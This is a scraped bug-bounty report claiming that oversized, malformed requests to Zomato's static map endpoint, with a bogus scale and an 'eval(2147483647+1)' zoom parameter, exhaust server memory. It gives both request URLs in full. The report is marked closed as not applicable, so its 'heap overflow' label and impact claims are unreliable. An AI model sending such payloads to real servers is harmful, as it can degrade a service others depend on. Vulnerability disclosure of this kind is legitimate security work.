Loading HuntDB...

Zomato Map server going out of memory while resizing map image

None
Z
Zomato
Submitted None
Reported by mchinmoy

Vulnerability Details

Technical details and impact analysis

Heap Overflow
Go to https://maps.zomato.com/php/staticmap?center=0,0&size=240x150&maptype=zomato&markers=180,180,pin_res32&sensor=false&scale=%&zoom=eval(2147483647+1)&language=en a map will be displayed Now increase the map size by 10x https://maps.zomato.com/php/staticmap?center=0,0&size=2400x1500&maptype=zomato&markers=180,180,pin_res32&sensor=false&scale=%&zoom=eval(2147483647+1)&language=en It will always timeout after waiting from 1-15 minutes POC video is attached. ## Impact Zomato Map servers can be bought down making map feature completely non functional and causing millions of dollars loss for Zomato.

Report Details

Additional information and metadata

State

Closed

Substate

Not-Applicable

Submitted

Weakness

Heap Overflow